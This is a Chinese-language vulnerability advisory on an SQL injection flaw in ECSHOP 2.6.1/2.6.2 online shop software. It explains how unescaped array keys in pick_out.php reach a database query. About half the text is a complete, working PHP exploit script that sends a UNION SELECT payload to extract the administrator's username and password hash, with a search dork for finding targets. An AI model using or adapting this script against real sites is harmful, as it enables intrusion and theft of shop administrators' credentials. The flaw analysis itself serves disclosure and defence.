ECSHOP商城系统过滤不严导致SQL注入漏洞

Posted by admin

May 26

添加时间:
2009-05-25

系统编号:
WAVDB-01431

影响版本:
ECSHOP 2.6.1/2.6.2

程序介绍:
ECSHOP是一款开源免费的网上商店系统。由专业的开发团队升级维护，为您提供及时高效的技术支持，您还可以根据自己的商务特征对ECSHOP进行定制，增加自己商城的特色功能。

漏洞分析:

文件includes/init.php判断get_magic_quotes_gpc(),如果为off则调用addslashes_deep():

// includes/init.php  
if (!get_magic_quotes_gpc())  
{  
    if (!emptyempty($_GET))  
    {  
        $_GET  = addslashes_deep($_GET);  
    }  
    if (!emptyempty($_POST))  
    {  
        $_POST = addslashes_deep($_POST);  
    }  
 
    $_COOKIE   = addslashes_deep($_COOKIE);  
    $_REQUEST  = addslashes_deep($_REQUEST);  
}  
addslashes_deep()在文件includes/lib_base.php里最后通过addslashes()处理
 
// includes/lib_base.php  
function addslashes_deep($value)  
{  
    if (emptyempty($value))  
    {  
        return $value;  
    }  
    else  
    {  
        return is_array($value) ? array_map('addslashes_deep', $value) : addslashes($value);  
    // 只处理了数组的值:)  
    }  
}

下面看下具体的导致漏洞的代码,文件 pick_out.php里:

// pick_out.php  
if (!emptyempty($_GET['attr']))  
{  
    foreach($_GET['attr'] as $key => $value)  
    {  
        $key = intval($key);  
        $_GET['attr'][$key] = htmlspecialchars($value);  
        // foreach处理的是指定数组的拷贝,所以这里的处理并不影响数组原先的key和value  
        // 因此可以引入任意的key:)  
        // 程序员的逻辑出了问题?  
    }  
}  
...  
        foreach ($_GET['attr'] AS $key => $value)  
        {  
            $attr_url .= '&attr[' . $key . ']=' . $value;  
 
            $attr_picks[] = $key;  
            if ($i > 0)  
            {  
                if (emptyempty($goods_result))  
                {  
                    break;  
                }  
                // 利用key进行注射:)  
                $goods_result = $db->getCol("Select goods_id FROM " . $ecs->table("goods_attr") . " Where goods_id IN (" . implode(',' , $goods_result) . ") AND attr_id='$key' AND attr_value='$value'");

由于magic_quotes_gpc=off时没有对$key处理,同时在数组赋值时存在逻辑问题,最终导致了注射漏洞.

漏洞利用:

#!/usr/bin/php  
<?php  
//本程序只作技术交流，请不要用做非法用途！！  
print_r('  
+---------------------------------------------------------------------------+  
ECShop <= v2.6.2 SQL injection / admin credentials disclosure exploit  
by puret_t  
mail: puretot at gmail dot com  
team: http://bbs.wolvez.org  
dork: "Powered by ECShop"  
+---------------------------------------------------------------------------+  
');  
/** 
 * works with magic_quotes_gpc = Off 
 */  
if ($argc < 3) {  
    print_r('  
+---------------------------------------------------------------------------+  
Usage: php '.$argv[0].' host path  
host:      target server (ip/hostname)  
path:      path to ecshop  
Example:  
php '.$argv[0].' localhost /ecshop/  
+---------------------------------------------------------------------------+  
');  
    exit;  
}  
 
error_reporting(7);  
ini_set('max_execution_time', 0);  
 
$host = $argv[1];  
$path = $argv[2];  
 
$resp = send();  
preg_match('#IN\s\(([\S]+):([a-z0-9]{32})\)#', $resp, $hash);  
 
if ($hash)  
    exit("Expoilt Success!\nadmin:\t$hash[1]\nPassword(md5):\t$hash[2]\n");  
else  
    exit("Exploit Failed!\n");  
 
function send()  
{  
    global $host, $path;  
 
    $cmd = 'cat_id=999999&attr[%27%20UNION%20Select%20CONCAT(user_name%2c0x3a%2cpassword)%20as%20goods_id%20FROM%20ecs_admin_user%20Where%20action_list%3d%27all%27%20LIMIT%201%23]=ryat';  
 
    $data = "GET ".$path."pick_out.php?".$cmd."  HTTP/1.1\r\n";  
    $data .= "Host: $host\r\n";  
    $data .= "Connection: Close\r\n\r\n";  
 
    $fp = fsockopen($host, 80);  
    fputs($fp, $data);  
 
    $resp = '';  
 
    while ($fp && !feof($fp))  
        $resp .= fread($fp, 1024);  
 
    return $resp;  
}  
 
?>